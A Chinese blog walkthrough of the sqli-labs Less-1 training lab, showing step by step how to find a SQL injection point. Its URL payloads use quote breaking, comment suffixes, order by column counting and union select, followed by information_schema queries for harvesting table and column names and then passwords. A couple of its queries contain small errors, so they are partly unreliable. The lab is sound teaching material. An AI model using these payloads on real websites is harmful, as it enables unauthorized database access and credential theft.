首页 > 数据库 >sqli-labs Basic Challenge Less_1 通关指南

sqli-labs Basic Challenge Less_1 通关指南

时间:2024-09-15 08:54:39浏览次数:11  
标签:Less Challenge labs 查找 报错 测试 id select 注入

sqli-labs Basic Challenge Less_1 通关指南

测试注入点

在进行SQL注入之前,首先要找到可能出现的注入点,以及其防护等级,也就是查找是否有漏洞。

进入网页之后显示这样的页面,提示为:

Please input the ID as parameter with numeric value

在这里插入图片描述
在网址后输入?id=1,显示出这个界面:
在这里插入图片描述
接下来我们开始详细分析这个注入点

测试注入点的数据类型

对于字符型、数字型和查找型的注入代码有所不同,所以要先判断注入点的类型。
对于这三种数据类型,书写代码时有所不同,如:

  1. 对于数字型:
select * from xxx where id =$id;

这种类型最为简单,直接注入不会有其他的影响。

  1. 对于字符型:
select * from xxx where id ='$id';

或者:

select * from xxx where id ="$id";

在进行注入的时候如果不进行任何其他操作,整个命令都会被当成一个字符型数据类型,导致注入的代码无法执行

  1. 对于查找型:
select * from xxx where id like %$id%;

查找型与字符型基本同理。

测试过程:

首先测试为数字型的可能性,我们输入:

/?id=1 and 1=1

以及

/?id=1 and 1=2

测试有无异常,发现没有异常。

然后我们测试为字符型的可能性:

/?id=1' and 1=2

发生报错:
在这里插入图片描述
报错信息为:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘and1=2’ LIMIT 0,1’ at line 1

报错信息大致意思时and1=2' LIMIT 0,1这附近的语句出现问题,确实,由于原语句中在'$id'之后有一段 LIMIT 0,1导致报错。
解决方案是:

/?id=1' and 1=2 --+

--+注释后面的代码即可,最后页面显示为:
在这里插入图片描述
出现异常。

测试返回点:

在SQL语句执行之后,服务器的数据会在Web中显示,我们需要确定哪一个点的数据被显示在特定位置上。

测试列数:

输入代码:

/?id=-1' and 1=1 order by n --+

n为常数,如果n超过列数即会报错。
在这里插入图片描述
报错信息为:

Unknown column ‘4’ in ‘order clause’

测试返回点:

输入代码:

/?id=-1' union select 1,2,3 --+

在这里插入图片描述
这样我们可以把代码中的2和3替换成其他命令,这样可以在Web中显示。

收集数据:

版本

可以通过version()函数获取,示例代码如下:

select version() 

用户权限

可以通过user()函数获取:

select user() 

库名

可以通过database()函数获取

select database() 

表名与列名

这里我们就要知道一些系统表的知识了:
详细请查看MySQL系统库之information_schema,这个表中记录了库名、表名、列名等有效信息。

select * from information_schema.tables where TABLE_SCHEMA='database()'

具体解释为:查找改数据库中所有表的信息。

select * from information_schema.column where TABLE_NAME='XXX'

具体解释为查找某个表中所有列名。

查找敏感信息

在获取了以上信息后,就可以查询一些敏感信息了,包括用户的用户名和密码等。

标签:Less,Challenge,labs,查找,报错,测试,id,select,注入
From: https://blog.csdn.net/2301_79896143/article/details/142268436

相关文章

  • Cisco Modeling Labs (CML) 2.7.2 发布下载,新增功能概览
    CiscoModelingLabs(CML)2.7.2-网络仿真工具思科建模实验室(CML)请访问原文链接:https://sysin.org/blog/cisco-modeling-labs-2/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgCiscoModelingLabs是我们用于网络仿真的首要平台。凭借易于使用的HTML5UI和......
  • TiDB 数据库核心原理与架构_Lesson 01 TiDB 数据库架构概述课程整理
    作者:尚雷5580注:本文基于TiDB官网董菲老师《TiDB数据库核心原理与架构(101)》系列教程之《Lesson01TiDB数据库架构概述》内容进行整理和补充。一、TiDB体系架构1.1TiDB五大核心特性一键水平扩缩容得益于存储与计算分离的架构,TiDB支持按需对计算和存储进行在线扩......
  • KDD 2024 OAG-Challenge Cup赛道三项冠军技术方案解读 | 内含中秋福利
    大众点评技术部/搜索与内容智能团队组成的BlackPearl队伍,参加了2024年KDD2024OAG-ChallengeCup赛道的WhoIsWho-IND、PST、AQA三道赛题,以较大优势包揽了该赛道全部赛题的冠军。本文对这三个赛道的夺冠方案分别进行了解读,希望对大家有所帮助或启发。KDD2024OAG-ChallengeCup......
  • .Net 状态机Stateless
    在Stateless库中,可以通过配置来获取状态(State)、触发器(Trigger)以及目标状态(DestinationState)。以下是如何进行配置的详细说明:1.创建状态机首先,你需要创建一个状态机实例。状态机实例需要指定当前状态和触发器类型。例如:varphoneCall=newStateMachine<State,Trigger>(St......
  • lesson05-设计主函数实现串口的初始化和运行
    根据boot.S里的内容,最后会跳转到kernel_main里,在这里会进行设置gpio引脚配置串口的初始化,然后循环运行,不断打印接受到的内容。//主函数voidkernel_main(){//串口初始化uart_init();//串口发送helloworlduart_send_string("Helloword!\n")//循环发......
  • lesson04-设计初始化bss段、读写寄存器值的汇编函数
    在内核启动时需要将bss段的所有数据清0,这里就需要memzero函数。.globalmemzero;全局可见memzero:strxzr,[x0],#8subsx1,x1,#8b.gtmemzeroret内核启动时需要经常读写soc内部寄存器的值,这里就需要用到对应的函数put32和get32。.globalput32......
  • 【转】Chrome 的无头模式升级了:推出 --headless=new
     Chrome的无头模式变得更好用了!本文概要介绍了近期的工程工作,让 Headless 更接近Chrome的常规“Headful”模式,让Headless对开发者更有用。背景早在2017年,Chrome59 便引入了所谓的无头模式,可让您在没有任何可见界面的无人值守环境中运行浏览器。从本质上讲,就是在不使用 ......
  • Serverless 安全新杀器:云安全中心护航容器安全
    作者:胡志广(独鳌)云安全中心对于Serverless容器用户的价值从云计算发展之初,各大云厂商及传统安全厂商就开始围绕云计算的形态来做安全解决方案。传统安全与云计算安全的形态与做法开始发生变化,同时随着这10多年的发展,安全越来越被国家、企业重视,安全本身也在不断的发生变化......
  • P11030 『DABOI Round 1』Blessings Repeated题解
    P11030『DABOIRound1』BlessingsRepeated题解【形式化题意】给定一个正整数\(k\)和两个字符串\(S,T\)。设字符串\(s\)为\(k\)个字符串\(S\)首尾相接得到的字符串,\(n=\verts\vert,m=\vertT\vert\)。设答案集合\(P=\{(i_0,i_1,\dots,i_{m-1})\mid0\lei......
  • 基于sqli-labs Less-1的sql注入原理详细讲解
    SQLiLabs是一个专为学习和测试SQL注入漏洞而设计的实验室平台。它旨在帮助安全研究人员、开发者以及网络安全爱好者深入理解和实践各种SQL注入攻击。SQLiLabs提供了一系列精心设计的实验室环境和挑战,模拟真实的SQL注入漏洞,并提供相应的解决方案。关于sqli-labs靶场的本......